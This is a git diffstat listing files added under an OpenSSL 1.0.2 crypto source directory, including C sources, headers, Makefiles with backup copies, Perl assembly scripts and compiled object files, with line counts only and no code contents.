 .../openssl-1.0.2/crypto/evp/m_null.c         |    98 +
 .../openssl-1.0.2/crypto/evp/m_null.o         |   Bin 0 -> 2128 bytes
 .../openssl-1.0.2/crypto/evp/m_ripemd.c       |   107 +
 .../openssl-1.0.2/crypto/evp/m_ripemd.o       |   Bin 0 -> 2488 bytes
 .../openssl-1.0.2/crypto/evp/m_sha.c          |   106 +
 .../openssl-1.0.2/crypto/evp/m_sha.o          |   Bin 0 -> 2456 bytes
 .../openssl-1.0.2/crypto/evp/m_sha1.c         |   235 +
 .../openssl-1.0.2/crypto/evp/m_sha1.o         |   Bin 0 -> 5256 bytes
 .../openssl-1.0.2/crypto/evp/m_sigver.c       |   203 +
 .../openssl-1.0.2/crypto/evp/m_sigver.o       |   Bin 0 -> 4504 bytes
 .../openssl-1.0.2/crypto/evp/m_wp.c           |    48 +
 .../openssl-1.0.2/crypto/evp/m_wp.o           |   Bin 0 -> 2376 bytes
 .../openssl-1.0.2/crypto/evp/names.c          |   215 +
 .../openssl-1.0.2/crypto/evp/names.o          |   Bin 0 -> 4528 bytes
 .../openssl-1.0.2/crypto/evp/openbsd_hw.c     |   431 +
 .../openssl-1.0.2/crypto/evp/p5_crpt.c        |   149 +
 .../openssl-1.0.2/crypto/evp/p5_crpt.o        |   Bin 0 -> 3984 bytes
 .../openssl-1.0.2/crypto/evp/p5_crpt2.c       |   334 +
 .../openssl-1.0.2/crypto/evp/p5_crpt2.o       |   Bin 0 -> 6112 bytes
 .../openssl-1.0.2/crypto/evp/p_dec.c          |    87 +
 .../openssl-1.0.2/crypto/evp/p_dec.o          |   Bin 0 -> 1672 bytes
 .../openssl-1.0.2/crypto/evp/p_enc.c          |    87 +
 .../openssl-1.0.2/crypto/evp/p_enc.o          |   Bin 0 -> 1672 bytes
 .../openssl-1.0.2/crypto/evp/p_lib.c          |   456 +
 .../openssl-1.0.2/crypto/evp/p_lib.o          |   Bin 0 -> 7440 bytes
 .../openssl-1.0.2/crypto/evp/p_open.c         |   129 +
 .../openssl-1.0.2/crypto/evp/p_open.o         |   Bin 0 -> 2880 bytes
 .../openssl-1.0.2/crypto/evp/p_seal.c         |   120 +
 .../openssl-1.0.2/crypto/evp/p_seal.o         |   Bin 0 -> 2680 bytes
 .../openssl-1.0.2/crypto/evp/p_sign.c         |   133 +
 .../openssl-1.0.2/crypto/evp/p_sign.o         |   Bin 0 -> 2736 bytes
 .../openssl-1.0.2/crypto/evp/p_verify.c       |   116 +
 .../openssl-1.0.2/crypto/evp/p_verify.o       |   Bin 0 -> 2672 bytes
 .../openssl-1.0.2/crypto/evp/pmeth_fn.c       |   346 +
 .../openssl-1.0.2/crypto/evp/pmeth_fn.o       |   Bin 0 -> 6208 bytes
 .../openssl-1.0.2/crypto/evp/pmeth_gn.c       |   215 +
 .../openssl-1.0.2/crypto/evp/pmeth_gn.o       |   Bin 0 -> 3800 bytes
 .../openssl-1.0.2/crypto/evp/pmeth_lib.c      |   613 +
 .../openssl-1.0.2/crypto/evp/pmeth_lib.o      |   Bin 0 -> 9504 bytes
 .../openssl-1.0.2/crypto/ex_data.c            |   644 +
 .../openssl-1.0.2/crypto/ex_data.o            |   Bin 0 -> 10976 bytes
 .../openssl-1.0.2/crypto/fips_err.h           |   223 +
 .../openssl-1.0.2/crypto/fips_ers.c           |     7 +
 .../openssl-1.0.2/crypto/fips_ers.o           |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/crypto/hmac/Makefile        |   108 +
 .../openssl-1.0.2/crypto/hmac/Makefile.bak    |   108 +
 .../openssl-1.0.2/crypto/hmac/Makefile.save   |   108 +
 .../openssl-1.0.2/crypto/hmac/hm_ameth.c      |   162 +
 .../openssl-1.0.2/crypto/hmac/hm_ameth.o      |   Bin 0 -> 3328 bytes
 .../openssl-1.0.2/crypto/hmac/hm_pmeth.c      |   262 +
 .../openssl-1.0.2/crypto/hmac/hm_pmeth.o      |   Bin 0 -> 5456 bytes
 .../openssl-1.0.2/crypto/hmac/hmac.c          |   253 +
 .../openssl-1.0.2/crypto/hmac/hmac.h          |   109 +
 .../openssl-1.0.2/crypto/hmac/hmac.o          |   Bin 0 -> 5416 bytes
 .../openssl-1.0.2/crypto/hmac/hmactest.c      |   167 +
 .../openssl-1.0.2/crypto/hmac/lib             |     0
 .../openssl-1.0.2/crypto/ia64cpuid.S          |   167 +
 .../openssl-1.0.2/crypto/idea/Makefile        |    89 +
 .../openssl-1.0.2/crypto/idea/Makefile.save   |    89 +
 .../openssl-1.0.2/crypto/idea/i_cbc.c         |   171 +
 .../openssl-1.0.2/crypto/idea/i_cfb64.c       |   123 +
 .../openssl-1.0.2/crypto/idea/i_ecb.c         |    88 +
 .../openssl-1.0.2/crypto/idea/i_ofb64.c       |   110 +
 .../openssl-1.0.2/crypto/idea/i_skey.c        |   171 +
 .../openssl-1.0.2/crypto/idea/idea.h          |   105 +
 .../openssl-1.0.2/crypto/idea/idea_lcl.h      |   216 +
 .../openssl-1.0.2/crypto/idea/idea_spd.c      |   283 +
 .../openssl-1.0.2/crypto/idea/ideatest.c      |   232 +
 .../openssl-1.0.2/crypto/idea/version         |    12 +
 .../openssl-1.0.2/crypto/install-crypto.com   |   196 +
 .../openssl-1.0.2/crypto/jpake/Makefile       |    64 +
 .../openssl-1.0.2/crypto/jpake/jpake.c        |   508 +
 .../openssl-1.0.2/crypto/jpake/jpake.h        |   128 +
 .../openssl-1.0.2/crypto/jpake/jpake_err.c    |   108 +
 .../openssl-1.0.2/crypto/jpake/jpaketest.c    |   185 +
 .../openssl-1.0.2/crypto/krb5/Makefile        |    84 +
 .../openssl-1.0.2/crypto/krb5/Makefile.bak    |    84 +
 .../openssl-1.0.2/crypto/krb5/Makefile.save   |    84 +
 .../openssl-1.0.2/crypto/krb5/krb5_asn.c      |   162 +
 .../openssl-1.0.2/crypto/krb5/krb5_asn.h      |   240 +
 .../openssl-1.0.2/crypto/krb5/krb5_asn.o      |   Bin 0 -> 14360 bytes
 .../openssl-1.0.2/crypto/krb5/lib             |     0
 .../openssl-1.0.2/crypto/lhash/Makefile       |    88 +
 .../openssl-1.0.2/crypto/lhash/Makefile.bak   |    88 +
 .../openssl-1.0.2/crypto/lhash/Makefile.save  |    88 +
 .../openssl-1.0.2/crypto/lhash/lh_stats.c     |   246 +
 .../openssl-1.0.2/crypto/lhash/lh_stats.o     |   Bin 0 -> 5768 bytes
 .../openssl-1.0.2/crypto/lhash/lh_test.c      |    88 +
 .../openssl-1.0.2/crypto/lhash/lhash.c        |   458 +
 .../openssl-1.0.2/crypto/lhash/lhash.h        |   240 +
 .../openssl-1.0.2/crypto/lhash/lhash.o        |   Bin 0 -> 5160 bytes
 .../openssl-1.0.2/crypto/lhash/lib            |     0
 .../openssl-1.0.2/crypto/lhash/num.pl         |    17 +
 .../openssl-1.0.2/crypto/lib                  |     0
 .../openssl-1.0.2/crypto/md2/Makefile         |    89 +
 .../openssl-1.0.2/crypto/md2/md2.c            |   119 +
 .../openssl-1.0.2/crypto/md2/md2.h            |    94 +
 .../openssl-1.0.2/crypto/md2/md2_dgst.c       |   224 +
 .../openssl-1.0.2/crypto/md2/md2_one.c        |    96 +
 .../openssl-1.0.2/crypto/md2/md2test.c        |   142 +
 .../openssl-1.0.2/crypto/md32_common.h        |   428 +
 .../openssl-1.0.2/crypto/md4/Makefile         |    89 +
 .../openssl-1.0.2/crypto/md4/Makefile.bak     |    89 +
 .../openssl-1.0.2/crypto/md4/Makefile.save    |    89 +
 .../openssl-1.0.2/crypto/md4/lib              |     0
 .../openssl-1.0.2/crypto/md4/md4.c            |   121 +
 .../openssl-1.0.2/crypto/md4/md4.h            |   119 +
 .../openssl-1.0.2/crypto/md4/md4_dgst.c       |   199 +
 .../openssl-1.0.2/crypto/md4/md4_dgst.o       |   Bin 0 -> 4088 bytes
 .../openssl-1.0.2/crypto/md4/md4_locl.h       |   113 +
 .../openssl-1.0.2/crypto/md4/md4_one.c        |    96 +
 .../openssl-1.0.2/crypto/md4/md4_one.o        |   Bin 0 -> 2024 bytes
 .../openssl-1.0.2/crypto/md4/md4s.cpp         |    78 +
 .../openssl-1.0.2/crypto/md4/md4test.c        |   133 +
 .../openssl-1.0.2/crypto/md5/Makefile         |   105 +
 .../openssl-1.0.2/crypto/md5/Makefile.bak     |   105 +
 .../openssl-1.0.2/crypto/md5/Makefile.save    |   105 +
 .../openssl-1.0.2/crypto/md5/asm/md5-586.pl   |   307 +
 .../openssl-1.0.2/crypto/md5/asm/md5-ia64.S   |   992 ++
 .../crypto/md5/asm/md5-sparcv9.pl             |   430 +
 .../crypto/md5/asm/md5-x86_64.pl              |   370 +
 .../openssl-1.0.2/crypto/md5/lib              |     0
 .../openssl-1.0.2/crypto/md5/md5.c            |   121 +
 .../openssl-1.0.2/crypto/md5/md5.h            |   119 +
 .../openssl-1.0.2/crypto/md5/md5_dgst.c       |   216 +
 .../openssl-1.0.2/crypto/md5/md5_dgst.o       |   Bin 0 -> 4632 bytes
 .../openssl-1.0.2/crypto/md5/md5_locl.h       |   133 +
 .../openssl-1.0.2/crypto/md5/md5_one.c        |    96 +
 .../openssl-1.0.2/crypto/md5/md5_one.o        |   Bin 0 -> 2024 bytes
 .../openssl-1.0.2/crypto/md5/md5s.cpp         |    78 +
 .../openssl-1.0.2/crypto/md5/md5test.c        |   138 +
 .../openssl-1.0.2/crypto/mdc2/Makefile        |    93 +
 .../openssl-1.0.2/crypto/mdc2/Makefile.bak    |    93 +
 .../openssl-1.0.2/crypto/mdc2/Makefile.save   |    93 +
 .../openssl-1.0.2/crypto/mdc2/lib             |     0
 .../openssl-1.0.2/crypto/mdc2/mdc2.h          |    94 +
 .../openssl-1.0.2/crypto/mdc2/mdc2_one.c      |    76 +
 .../openssl-1.0.2/crypto/mdc2/mdc2_one.o      |   Bin 0 -> 2016 bytes
 .../openssl-1.0.2/crypto/mdc2/mdc2dgst.c      |   196 +
 .../openssl-1.0.2/crypto/mdc2/mdc2dgst.o      |   Bin 0 -> 2768 bytes
 .../openssl-1.0.2/crypto/mdc2/mdc2test.c      |   146 +
 .../openssl-1.0.2/crypto/mem.c                |   463 +
 .../openssl-1.0.2/crypto/mem.o                |   Bin 0 -> 9400 bytes
 .../openssl-1.0.2/crypto/mem_clr.c            |    77 +
 .../openssl-1.0.2/crypto/mem_clr.o            |   Bin 0 -> 1696 bytes
 .../openssl-1.0.2/crypto/mem_dbg.c            |   830 ++
 .../openssl-1.0.2/crypto/mem_dbg.o            |   Bin 0 -> 12640 bytes
 .../openssl-1.0.2/crypto/modes/Makefile       |   158 +
 .../openssl-1.0.2/crypto/modes/Makefile.bak   |   158 +
 .../openssl-1.0.2/crypto/modes/Makefile.save  |   158 +
 .../crypto/modes/asm/aesni-gcm-x86_64.pl      |  1057 ++
 .../crypto/modes/asm/ghash-alpha.pl           |   460 +
 .../crypto/modes/asm/ghash-armv4.pl           |   493 +
 .../crypto/modes/asm/ghash-ia64.pl            |   463 +
 .../crypto/modes/asm/ghash-parisc.pl          |   731 ++
 .../crypto/modes/asm/ghash-s390x.pl           |   262 +
 .../crypto/modes/asm/ghash-sparcv9.pl         |   571 +
 .../crypto/modes/asm/ghash-x86.pl             |  1393 ++
 .../crypto/modes/asm/ghash-x86_64.pl          |  1753 +++
 .../crypto/modes/asm/ghashp8-ppc.pl           |   234 +
 .../crypto/modes/asm/ghashv8-armx.pl          |   241 +
 .../openssl-1.0.2/crypto/modes/cbc128.c       |   207 +
 .../openssl-1.0.2/crypto/modes/cbc128.o       |   Bin 0 -> 2424 bytes
 .../openssl-1.0.2/crypto/modes/ccm128.c       |   479 +
 .../openssl-1.0.2/crypto/modes/ccm128.o       |   Bin 0 -> 5280 bytes
 .../openssl-1.0.2/crypto/modes/cfb128.c       |   254 +
 .../openssl-1.0.2/crypto/modes/cfb128.o       |   Bin 0 -> 3160 bytes
 .../openssl-1.0.2/crypto/modes/ctr128.c       |   270 +
 .../openssl-1.0.2/crypto/modes/ctr128.o       |   Bin 0 -> 2440 bytes
 .../openssl-1.0.2/crypto/modes/cts128.c       |   544 +
 .../openssl-1.0.2/crypto/modes/cts128.o       |   Bin 0 -> 4856 bytes
 .../openssl-1.0.2/crypto/modes/gcm128.c       |  2363 ++++
 .../openssl-1.0.2/crypto/modes/gcm128.o       |   Bin 0 -> 7984 bytes
 .../openssl-1.0.2/crypto/modes/lib            |     0
 .../openssl-1.0.2/crypto/modes/modes.h        |   163 +
 .../openssl-1.0.2/crypto/modes/modes_lcl.h    |   143 +
 .../openssl-1.0.2/crypto/modes/ofb128.c       |   124 +
 .../openssl-1.0.2/crypto/modes/ofb128.o       |   Bin 0 -> 1696 bytes
 .../openssl-1.0.2/crypto/modes/wrap128.c      |   138 +
 .../openssl-1.0.2/crypto/modes/wrap128.o      |   Bin 0 -> 2800 bytes
 .../openssl-1.0.2/crypto/modes/xts128.c       |   204 +
 .../openssl-1.0.2/crypto/modes/xts128.o       |   Bin 0 -> 2176 bytes
 .../openssl-1.0.2/crypto/o_dir.c              |    86 +
 .../openssl-1.0.2/crypto/o_dir.h              |    55 +
 .../openssl-1.0.2/crypto/o_dir.o              |   Bin 0 -> 2352 bytes
 .../openssl-1.0.2/crypto/o_dir_test.c         |    68 +
 .../openssl-1.0.2/crypto/o_fips.c             |    96 +
 .../openssl-1.0.2/crypto/o_fips.o             |   Bin 0 -> 1776 bytes
 .../openssl-1.0.2/crypto/o_init.c             |    83 +
 .../openssl-1.0.2/crypto/o_init.o             |   Bin 0 -> 1536 bytes
 .../openssl-1.0.2/crypto/o_str.c              |   116 +
 .../openssl-1.0.2/crypto/o_str.h              |    69 +
 .../openssl-1.0.2/crypto/o_str.o              |   Bin 0 -> 1792 bytes
 .../openssl-1.0.2/crypto/o_time.c             |   440 +
 .../openssl-1.0.2/crypto/o_time.h             |    70 +
 .../openssl-1.0.2/crypto/o_time.o             |   Bin 0 -> 2744 bytes
 .../openssl-1.0.2/crypto/objects/Makefile     |   130 +
 .../openssl-1.0.2/crypto/objects/Makefile.bak |   130 +
 .../crypto/objects/Makefile.save              |   130 +
 .../openssl-1.0.2/crypto/objects/lib          |     0
 .../openssl-1.0.2/crypto/objects/o_names.c    |   363 +
 .../openssl-1.0.2/crypto/objects/o_names.o    |   Bin 0 -> 7664 bytes
 .../openssl-1.0.2/crypto/objects/obj_dat.c    |   796 ++
 .../openssl-1.0.2/crypto/objects/obj_dat.h    |  5319 ++++++++
 .../openssl-1.0.2/crypto/objects/obj_dat.o    |   Bin 0 -> 156296 bytes
 .../openssl-1.0.2/crypto/objects/obj_dat.pl   |   307 +
 .../openssl-1.0.2/crypto/objects/obj_err.c    |   100 +
 .../openssl-1.0.2/crypto/objects/obj_err.o    |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/objects/obj_lib.c    |   135 +
 .../openssl-1.0.2/crypto/objects/obj_lib.o    |   Bin 0 -> 2632 bytes
 .../openssl-1.0.2/crypto/objects/obj_mac.h    |  4195 ++++++
 .../openssl-1.0.2/crypto/objects/obj_mac.num  |   957 ++
 .../openssl-1.0.2/crypto/objects/obj_xref.c   |   222 +
 .../openssl-1.0.2/crypto/objects/obj_xref.h   |    94 +
 .../openssl-1.0.2/crypto/objects/obj_xref.o   |   Bin 0 -> 6536 bytes
 .../openssl-1.0.2/crypto/objects/obj_xref.txt |    58 +
 .../crypto/objects/objects.README             |    44 +
 .../openssl-1.0.2/crypto/objects/objects.h    |  1143 ++
 .../openssl-1.0.2/crypto/objects/objects.pl   |   232 +
 .../openssl-1.0.2/crypto/objects/objects.txt  |  1350 ++
 .../openssl-1.0.2/crypto/objects/objxref.pl   |   111 +
 .../openssl-1.0.2/crypto/ocsp/Makefile        |   201 +
 .../openssl-1.0.2/crypto/ocsp/Makefile.bak    |   201 +
 .../openssl-1.0.2/crypto/ocsp/Makefile.save   |   201 +
 .../openssl-1.0.2/crypto/ocsp/lib             |     0
 .../openssl-1.0.2/crypto/ocsp/ocsp.h          |   637 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_asn.c      |   183 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_asn.o      |   Bin 0 -> 19424 bytes
 .../openssl-1.0.2/crypto/ocsp/ocsp_cl.c       |   383 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_cl.o       |   Bin 0 -> 6736 bytes
 .../openssl-1.0.2/crypto/ocsp/ocsp_err.c      |   149 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_err.o      |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/ocsp/ocsp_ext.c      |   566 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_ext.o      |   Bin 0 -> 11208 bytes
 .../openssl-1.0.2/crypto/ocsp/ocsp_ht.c       |   555 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_ht.o       |   Bin 0 -> 8232 bytes
 .../openssl-1.0.2/crypto/ocsp/ocsp_lib.c      |   290 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_lib.o      |   Bin 0 -> 5752 bytes
 .../openssl-1.0.2/crypto/ocsp/ocsp_prn.c      |   300 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_prn.o      |   Bin 0 -> 10136 bytes
 .../openssl-1.0.2/crypto/ocsp/ocsp_srv.c      |   271 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_srv.o      |   Bin 0 -> 5968 bytes
 .../openssl-1.0.2/crypto/ocsp/ocsp_vfy.c      |   441 +
 .../openssl-1.0.2/crypto/ocsp/ocsp_vfy.o      |   Bin 0 -> 7272 bytes
 .../openssl-1.0.2/crypto/opensslconf.h        |   334 +
 .../openssl-1.0.2/crypto/opensslconf.h.bak    |   334 +
 .../openssl-1.0.2/crypto/opensslconf.h.in     |   154 +
 .../openssl-1.0.2/crypto/opensslv.h           |    97 +
 .../openssl-1.0.2/crypto/ossl_typ.h           |   211 +
 .../openssl-1.0.2/crypto/pariscid.pl          |   225 +
 .../openssl-1.0.2/crypto/pem/Makefile         |   240 +
 .../openssl-1.0.2/crypto/pem/Makefile.bak     |   240 +
 .../openssl-1.0.2/crypto/pem/Makefile.save    |   240 +
 .../openssl-1.0.2/crypto/pem/lib              |     0
 .../openssl-1.0.2/crypto/pem/message          |    16 +
 .../openssl-1.0.2/crypto/pem/pem.h            |   615 +
 .../openssl-1.0.2/crypto/pem/pem2.h           |    70 +
 .../openssl-1.0.2/crypto/pem/pem_all.c        |   427 +
 .../openssl-1.0.2/crypto/pem/pem_all.o        |   Bin 0 -> 14288 bytes
 .../openssl-1.0.2/crypto/pem/pem_err.c        |   168 +
 .../openssl-1.0.2/crypto/pem/pem_err.o        |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/pem/pem_info.c       |   388 +
 .../openssl-1.0.2/crypto/pem/pem_info.o       |   Bin 0 -> 7152 bytes
 .../openssl-1.0.2/crypto/pem/pem_lib.c        |   865 ++
 .../openssl-1.0.2/crypto/pem/pem_lib.o        |   Bin 0 -> 18448 bytes
 .../openssl-1.0.2/crypto/pem/pem_oth.c        |    86 +
 .../openssl-1.0.2/crypto/pem/pem_oth.o        |   Bin 0 -> 1968 bytes
 .../openssl-1.0.2/crypto/pem/pem_pk8.c        |   257 +
 .../openssl-1.0.2/crypto/pem/pem_pk8.o        |   Bin 0 -> 7632 bytes
 .../openssl-1.0.2/crypto/pem/pem_pkey.c       |   293 +
 .../openssl-1.0.2/crypto/pem/pem_pkey.o       |   Bin 0 -> 7832 bytes
 .../openssl-1.0.2/crypto/pem/pem_seal.c       |   191 +
 .../openssl-1.0.2/crypto/pem/pem_seal.o       |   Bin 0 -> 4608 bytes
 .../openssl-1.0.2/crypto/pem/pem_sign.c       |   101 +
 .../openssl-1.0.2/crypto/pem/pem_sign.o       |   Bin 0 -> 2648 bytes
 .../openssl-1.0.2/crypto/pem/pem_x509.c       |    68 +
 .../openssl-1.0.2/crypto/pem/pem_x509.o       |   Bin 0 -> 2584 bytes
 .../openssl-1.0.2/crypto/pem/pem_xaux.c       |    70 +
 .../openssl-1.0.2/crypto/pem/pem_xaux.o       |   Bin 0 -> 3608 bytes
 .../openssl-1.0.2/crypto/pem/pkcs7.lis        |    22 +
 .../openssl-1.0.2/crypto/pem/pvkfmt.c         |   883 ++
 .../openssl-1.0.2/crypto/pem/pvkfmt.o         |   Bin 0 -> 14008 bytes
 .../openssl-1.0.2/crypto/perlasm/cbc.pl       |   349 +
 .../openssl-1.0.2/crypto/perlasm/ppc-xlate.pl |   226 +
 .../openssl-1.0.2/crypto/perlasm/readme       |   124 +
 .../crypto/perlasm/sparcv9_modes.pl           |  1686 +++
 .../crypto/perlasm/x86_64-xlate.pl            |  1148 ++
 .../openssl-1.0.2/crypto/perlasm/x86asm.pl    |   298 +
 .../openssl-1.0.2/crypto/perlasm/x86gas.pl    |   258 +
 .../openssl-1.0.2/crypto/perlasm/x86masm.pl   |   200 +
 .../openssl-1.0.2/crypto/perlasm/x86nasm.pl   |   179 +
 .../openssl-1.0.2/crypto/pkcs12/Makefile      |   263 +
 .../openssl-1.0.2/crypto/pkcs12/Makefile.bak  |   263 +
 .../openssl-1.0.2/crypto/pkcs12/Makefile.save |   263 +
 .../openssl-1.0.2/crypto/pkcs12/lib           |     0
 .../openssl-1.0.2/crypto/pkcs12/p12_add.c     |   245 +
 .../openssl-1.0.2/crypto/pkcs12/p12_add.o     |   Bin 0 -> 5640 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_asn.c     |   125 +
 .../openssl-1.0.2/crypto/pkcs12/p12_asn.o     |   Bin 0 -> 8968 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_attr.c    |   147 +
 .../openssl-1.0.2/crypto/pkcs12/p12_attr.o    |   Bin 0 -> 3096 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_crpt.c    |   116 +
 .../openssl-1.0.2/crypto/pkcs12/p12_crpt.o    |   Bin 0 -> 2872 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_crt.c     |   358 +
 .../openssl-1.0.2/crypto/pkcs12/p12_crt.o     |   Bin 0 -> 6600 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_decr.c    |   202 +
 .../openssl-1.0.2/crypto/pkcs12/p12_decr.o    |   Bin 0 -> 4312 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_init.c    |    92 +
 .../openssl-1.0.2/crypto/pkcs12/p12_init.o    |   Bin 0 -> 2064 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_key.c     |   238 +
 .../openssl-1.0.2/crypto/pkcs12/p12_key.o     |   Bin 0 -> 5024 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_kiss.c    |   297 +
 .../openssl-1.0.2/crypto/pkcs12/p12_kiss.o    |   Bin 0 -> 5384 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_mutl.c    |   194 +
 .../openssl-1.0.2/crypto/pkcs12/p12_mutl.o    |   Bin 0 -> 5360 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_npas.c    |   235 +
 .../openssl-1.0.2/crypto/pkcs12/p12_npas.o    |   Bin 0 -> 4872 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_p8d.c     |    70 +
 .../openssl-1.0.2/crypto/pkcs12/p12_p8d.o     |   Bin 0 -> 1648 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_p8e.c     |   105 +
 .../openssl-1.0.2/crypto/pkcs12/p12_p8e.o     |   Bin 0 -> 2608 bytes
 .../openssl-1.0.2/crypto/pkcs12/p12_utl.c     |   161 +
 .../openssl-1.0.2/crypto/pkcs12/p12_utl.o     |   Bin 0 -> 4008 bytes
 .../openssl-1.0.2/crypto/pkcs12/pk12err.c     |   149 +
 .../openssl-1.0.2/crypto/pkcs12/pk12err.o     |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/pkcs12/pkcs12.h      |   342 +
 .../openssl-1.0.2/crypto/pkcs7/Makefile       |   171 +
 .../openssl-1.0.2/crypto/pkcs7/Makefile.bak   |   171 +
 .../openssl-1.0.2/crypto/pkcs7/Makefile.save  |   171 +
 .../openssl-1.0.2/crypto/pkcs7/bio_pk7.c      |    70 +
 .../openssl-1.0.2/crypto/pkcs7/bio_pk7.o      |   Bin 0 -> 1608 bytes
 .../openssl-1.0.2/crypto/pkcs7/lib            |     0
 .../openssl-1.0.2/crypto/pkcs7/pk7_asn1.c     |   251 +
 .../openssl-1.0.2/crypto/pkcs7/pk7_asn1.o     |   Bin 0 -> 17920 bytes
 .../openssl-1.0.2/crypto/pkcs7/pk7_attr.c     |   165 +
 .../openssl-1.0.2/crypto/pkcs7/pk7_attr.o     |   Bin 0 -> 4168 bytes
 .../openssl-1.0.2/crypto/pkcs7/pk7_dgst.c     |    65 +
 .../openssl-1.0.2/crypto/pkcs7/pk7_doit.c     |  1221 ++
 .../openssl-1.0.2/crypto/pkcs7/pk7_doit.o     |   Bin 0 -> 22008 bytes
 .../openssl-1.0.2/crypto/pkcs7/pk7_enc.c      |    75 +
 .../openssl-1.0.2/crypto/pkcs7/pk7_lib.c      |   643 +
 .../openssl-1.0.2/crypto/pkcs7/pk7_lib.o      |   Bin 0 -> 11752 bytes
 .../openssl-1.0.2/crypto/pkcs7/pk7_mime.c     |    96 +
 .../openssl-1.0.2/crypto/pkcs7/pk7_mime.o     |   Bin 0 -> 2544 bytes
 .../openssl-1.0.2/crypto/pkcs7/pk7_smime.c    |   586 +
 .../openssl-1.0.2/crypto/pkcs7/pk7_smime.o    |   Bin 0 -> 11696 bytes
 .../openssl-1.0.2/crypto/pkcs7/pkcs7.h        |   481 +
 .../openssl-1.0.2/crypto/pkcs7/pkcs7err.c     |   207 +
 .../openssl-1.0.2/crypto/pkcs7/pkcs7err.o     |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/ppc_arch.h           |    10 +
 .../openssl-1.0.2/crypto/ppccap.c             |   159 +
 .../openssl-1.0.2/crypto/ppccpuid.pl          |   148 +
 .../openssl-1.0.2/crypto/pqueue/Makefile      |    83 +
 .../openssl-1.0.2/crypto/pqueue/Makefile.bak  |    83 +
 .../openssl-1.0.2/crypto/pqueue/Makefile.save |    83 +
 .../openssl-1.0.2/crypto/pqueue/lib           |     0
 .../openssl-1.0.2/crypto/pqueue/pq_test.c     |    94 +
 .../openssl-1.0.2/crypto/pqueue/pqueue.c      |   235 +
 .../openssl-1.0.2/crypto/pqueue/pqueue.h      |    99 +
 .../openssl-1.0.2/crypto/pqueue/pqueue.o      |   Bin 0 -> 3544 bytes
 .../openssl-1.0.2/crypto/rand/Makefile        |   158 +
 .../openssl-1.0.2/crypto/rand/Makefile.bak    |   158 +
 .../openssl-1.0.2/crypto/rand/Makefile.save   |   158 +
 .../openssl-1.0.2/crypto/rand/lib             |     0
 .../openssl-1.0.2/crypto/rand/md_rand.c       |   592 +
 .../openssl-1.0.2/crypto/rand/md_rand.o       |   Bin 0 -> 10576 bytes
 .../openssl-1.0.2/crypto/rand/rand.h          |   150 +
 .../openssl-1.0.2/crypto/rand/rand_egd.c      |   291 +
 .../openssl-1.0.2/crypto/rand/rand_egd.o      |   Bin 0 -> 3032 bytes
 .../openssl-1.0.2/crypto/rand/rand_err.c      |   100 +
 .../openssl-1.0.2/crypto/rand/rand_err.o      |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/rand/rand_lcl.h      |   158 +
 .../openssl-1.0.2/crypto/rand/rand_lib.c      |   300 +
 .../openssl-1.0.2/crypto/rand/rand_lib.o      |   Bin 0 -> 2888 bytes
 .../openssl-1.0.2/crypto/rand/rand_nw.c       |   179 +
 .../openssl-1.0.2/crypto/rand/rand_nw.o       |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/crypto/rand/rand_os2.c      |   167 +
 .../openssl-1.0.2/crypto/rand/rand_os2.o      |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/crypto/rand/rand_unix.c     |   447 +
 .../openssl-1.0.2/crypto/rand/rand_unix.o     |   Bin 0 -> 3736 bytes
 .../openssl-1.0.2/crypto/rand/rand_vms.c      |   159 +
 .../openssl-1.0.2/crypto/rand/rand_win.c      |   752 ++
 .../openssl-1.0.2/crypto/rand/rand_win.o      |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/crypto/rand/randfile.c      |   337 +
 .../openssl-1.0.2/crypto/rand/randfile.o      |   Bin 0 -> 4288 bytes
 .../openssl-1.0.2/crypto/rand/randtest.c      |   209 +
 .../openssl-1.0.2/crypto/rc2/Makefile         |    90 +
 .../openssl-1.0.2/crypto/rc2/Makefile.bak     |    90 +
 .../openssl-1.0.2/crypto/rc2/Makefile.save    |    90 +
 .../openssl-1.0.2/crypto/rc2/lib              |     0
 .../openssl-1.0.2/crypto/rc2/rc2.h            |   103 +
 .../openssl-1.0.2/crypto/rc2/rc2_cbc.c        |   228 +
 .../openssl-1.0.2/crypto/rc2/rc2_cbc.o        |   Bin 0 -> 4176 bytes
 .../openssl-1.0.2/crypto/rc2/rc2_ecb.c        |    92 +
 .../openssl-1.0.2/crypto/rc2/rc2_ecb.o        |   Bin 0 -> 1968 bytes
 .../openssl-1.0.2/crypto/rc2/rc2_locl.h       |   155 +
 .../openssl-1.0.2/crypto/rc2/rc2_skey.c       |   157 +
 .../openssl-1.0.2/crypto/rc2/rc2_skey.o       |   Bin 0 -> 2064 bytes
 .../openssl-1.0.2/crypto/rc2/rc2cfb64.c       |   123 +
 .../openssl-1.0.2/crypto/rc2/rc2cfb64.o       |   Bin 0 -> 1976 bytes
 .../openssl-1.0.2/crypto/rc2/rc2ofb64.c       |   110 +
 .../openssl-1.0.2/crypto/rc2/rc2ofb64.o       |   Bin 0 -> 1896 bytes
